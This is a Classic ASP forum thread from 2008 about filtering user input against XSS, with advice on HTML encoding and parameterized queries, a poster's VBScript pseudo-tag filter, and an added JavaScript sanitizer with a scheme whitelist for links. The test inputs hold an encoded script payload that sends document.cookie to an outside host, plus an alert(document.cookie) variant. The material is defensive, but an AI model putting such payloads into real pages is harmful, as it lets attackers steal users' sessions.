Wrox Programmer Forums, Classic ASP Professional: for advanced coder questions in ASP 3, NOT for ASP.NET 1.0, 1.1, or 2.0.
Code Injection

Post #1, March 6th, 2008, 01:28 PM, by a Friend of Wrox (Minneapolis, MN, USA)

Does anyone have any foolproof way of filtering all non-alphanumeric values from user input but allowing predefined HTML tags such as:

<b></b>
<i></i>
<u></u>
<table></table>
<tr></tr>
<td></td>
<ol></ol>
<ul></ul>
<li></li>

as well as maintaining non-threatening links? Any help on this is greatly appreciated. Thanks in advance.

Dave

Post #2, March 6th, 2008, 03:07 PM, by dparsons (Wrox Author; Ohio, USA)
With regard to the predefined tags, IMHO, it is better practice to use a type of forum code. For example, if I want to make some text bold on this forum I use [ b ] [ /b ] with no spaces. The forum then translates that into <b></b>.

If you take this approach with the predefined tags, your job of handling malicious code becomes easier because you can simply HTMLEncode the rest of the input, which will render most XSS attacks useless. However, if you are looking for an approach to detect a <script></script> block, for example, you should use Regular Expressions. (You could of course use InStr(), but that isn't nearly as efficient as RegEx.)

The easiest way to avoid SQL Injection attacks is to use parameterized queries as opposed to inline dynamic SQL.

hth.

Post #3, March 6th, 2008, 06:04 PM, by the original poster (Friend of Wrox; Minneapolis, MN, USA)

I thought about using regular expressions, but I don't quite have the experience with them to get something really bulletproof in a short amount of time.

I thought of a solution that I think might work well using pseudo tags (i.e. forum tags) and thought I'd post the code to get some other opinions. It requires defining some acceptable pseudo tags and assigning them a unique alphanumeric value, in my case 32 digits in length.

There are 4 replace filters that I run the string through and they are as follows:
1) Replace all encoded values with their standard values (e.g. '%26' to '&').
2) Transpose pseudo tags into 32 digit unique values (e.g. '[ul]' to 'koxfyyyao5u2s8kzuj6nrev2ujkkhrvx1').
3) Replace all non-acceptable characters with the equivalent HTML code OR possibly remove them altogether (e.g. '<' to '&#60;').
4) Transpose all unique 32 digit values back to the previous pseudo tags (e.g. 'koxfyyyao5u2s8kzuj6nrev2ujkkhrvx1' to '[ul]').
5) Translate pseudo tags at run time (e.g. '[ul]' to '<ul>').

I think that if this is run against some rogue injection the result will be enough to eliminate the threat, even though the output is less than desirable. It should however work well for standard text, including minor HTML tags.

If anyone has any thoughts on this I would love to hear them. The solution is as follows:

NOTE: I had to add in a couple of spaces for pseudos to avoid their being interpreted by this forum (e.g. [ url ]).

<%
Option Explicit
Dim MyString, i, t, c, Ch, Tags, Tokens, StripChars, EncodeChars

'-- Malicious URL (test input; the query string is the cgisecurity.com XSS sample, URL-encoded) --
MyString = "[ url]http://host/a.php?variable=%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e[ -url]Test Link[ /url]"

'-- The same URL once decoded, for reference --
' http://host/a.php?variable="><script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?'%20+document.cookie</script>

' == 1) replace %XX hex escapes (printable ASCII 0x20-0x7E, upper or lower case) with the literal character ==
' Request.Form / Request.QueryString values are already URL-decoded once by ASP,
' so this pass only matters for values that arrive encoded twice.
For i = 32 To 126
    MyString = Replace(MyString, "%" & Hex(i), Chr(i), 1, -1, vbTextCompare)
Next
' Debug output of the still-dangerous intermediate, so it is encoded before being written.
Response.Write "1: " & Server.HTMLEncode(MyString) & "<br><br>"

' == 2) transpose pseudo tags into 32 digit unique values (case-insensitive, so [UL] matches too) ==
Tags   = Array("[ url]", "[ -url]", "[ /url]", "[ol]", "[/ol]", "[ul]", "[/ul]", "[li]", "[/li]")
Tokens = Array("ix8yyagzczursx3ujnyfqj6hkaeftcye1", "ix8yyagzczursx3ujnyfqj6hkaeftcye2", "ix8yyagzczursx3ujnyfqj6hkaeftcye3", _
               "w6ck3hngas7asxqgzdcvp8gklp5gvytr1", "w6ck3hngas7asxqgzdcvp8gklp5gvytr2", _
               "koxfyyyao5u2s8kzuj6nrev2ujkkhrvx1", "koxfyyyao5u2s8kzuj6nrev2ujkkhrvx2", _
               "pnqxkkk3zlvupblgayqyksv7nfs5zrcd1", "pnqxkkk3zlvupblgayqyksv7nfs5zrcd2")
For t = 0 To UBound(Tags)
    MyString = Replace(MyString, Tags(t), Tokens(t), 1, -1, vbTextCompare)
Next

' == 3) replace non-acceptable characters with HTML character references, or remove them ==
' '<', '>', '[' and ']' are removed outright; the rest become &#nn; references.
' '&', '#' and ';' are deliberately left alone because the references themselves use them
' (if '&' is ever encoded, it has to happen before this loop, not after it).
StripChars  = "<>[]"
EncodeChars = "!""$%'()*+,-./:=?@\^_`{|}~"
For c = 1 To Len(StripChars)
    MyString = Replace(MyString, Mid(StripChars, c, 1), "")
Next
For c = 1 To Len(EncodeChars)
    Ch = Mid(EncodeChars, c, 1)
    MyString = Replace(MyString, Ch, "&#" & Asc(Ch) & ";")
Next

' == 4) transpose the 32 digit unique values back into pseudo tags ==
For t = 0 To UBound(Tags)
    MyString = Replace(MyString, Tokens(t), Tags(t))
Next
Response.Write "4: " & MyString & "<br><br>"
%>
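The approach the two replies describe, as an added example that is not code from this thread or from Wrox: dparsons' recommendation (HTML-encode all of the input, turn a small set of forum-style pseudo tags into HTML, and use a regular expression only to detect a script block) combined with the [url]href[-url]text[/url] form, the single pass of percent-decoding and the run-time tag translation from the post above. It is written in ES3-style JavaScript so that it runs under Node and, unchanged, as server-side JScript (5.5 or later) in a Classic ASP page. The tag list, the link form and the http(s)-only link rule are this example's own choices, and the test input is constructed for the example, re-using the %22%3e%3c%73%63%72%69%70%74%3e encoding trick from the cgisecurity URL. Because the whole string is encoded before any pseudo tag is translated, the placeholder tokens are not needed: the only '<' and '>' in the output are the ones the translator writes, and apostrophes, parentheses and the rest stay readable. The href is checked against a scheme whitelist rather than only character-encoded, because a browser decodes character references inside an attribute before it parses the URL, so an encoded colon would not keep a javascript: link from running.

```javascript
// Added example, not code from the thread. ES3-style JavaScript: runs under Node
// and, unchanged, as server-side JScript (5.5+) in a Classic ASP page.
// The tag list, the [url]href[-url]text[/url] form and the http(s)-only link
// rule are this example's own choices.

// Step 1: a single pass of %XX decoding, limited to printable ASCII like the
// REPLACE list in the post. ASP's Request collections already decode once, so
// this only matters for a value that arrived encoded twice. It runs BEFORE
// encoding so that a decoded '<' is still caught by htmlEncode().
function decodePercent(s) {
  return s.replace(/%([0-9a-fA-F]{2})/g, function (match, hex) {
    var code = parseInt(hex, 16);
    return (code >= 0x20 && code <= 0x7e) ? String.fromCharCode(code) : match;
  });
}

// Step 2: encode the HTML metacharacters. Server.HTMLEncode covers '&', '<',
// '>' and '"'; the apostrophe is added here for attribute contexts.
function htmlEncode(s) {
  return s.replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;")
          .replace(/"/g, "&quot;").replace(/'/g, "&#39;");
}

// Detection only, the RegEx dparsons suggests: useful for logging or rejecting
// a submission outright, but not a replacement for encoding.
function looksLikeScript(s) {
  return /<\s*\/?\s*script\b/i.test(s);
}

var SIMPLE_TAGS = ["b", "i", "u", "ol", "ul", "li"];   // [b]...[/b] -> <b>...</b>
var SAFE_HREF = /^https?:\/\/\S+$/i;                    // scheme whitelist, no whitespace

// Step 3: translate pseudo tags on the already-encoded text. Because step 2 ran
// first, the only '<' and '>' in the result are the ones written here, so the
// placeholder tokens from the post are not needed.
function translateTags(encoded) {
  var out = encoded, k, name;
  for (k = 0; k < SIMPLE_TAGS.length; k++) {
    name = SIMPLE_TAGS[k];
    out = out.replace(new RegExp("\\[(/?)" + name + "\\]", "gi"), "<$1" + name + ">");
  }
  // [url]href[-url]text[/url]. The href is matched against a scheme whitelist
  // instead of only being character-encoded: a browser decodes &#58; inside an
  // attribute before it parses the URL, so an encoded colon would not stop a
  // javascript: link. A rejected href degrades to its plain (encoded) text.
  out = out.replace(/\[url\]([\s\S]*?)\[-url\]([\s\S]*?)\[\/url\]/gi,
    function (match, href, text) {
      return SAFE_HREF.test(href) ? '<a href="' + href + '">' + text + "</a>" : text;
    });
  return out;
}

function sanitize(input) {
  return translateTags(htmlEncode(decodePercent(input)));
}

// Constructed test input: the same %22%3e%3c%73%63%72%69%70%74%3e ("><script>)
// trick as the cgisecurity URL in the post, wrapped in the [url] pseudo tag.
var PAYLOAD = "[url]http://host/a.php?v=%22%3e%3c%73%63%72%69%70%74%3e" +
              "alert(document.cookie)%3c%2f%73%63%72%69%70%74%3e[-url]Test Link[/url]";

// In ASP: Response.Write(sanitize(String(Request.Form("body"))));
```

Run against PAYLOAD, the output is an anchor whose href still contains the attacker's text, but only as &quot;, &lt; and &gt; references, so it can neither close the attribute nor start a tag; a [url]javascript:...[/url] or [url]javascript&#58;...[/url] link collapses to its text; and "%253c" survives only as the literal text "%3c", because the decoder runs once.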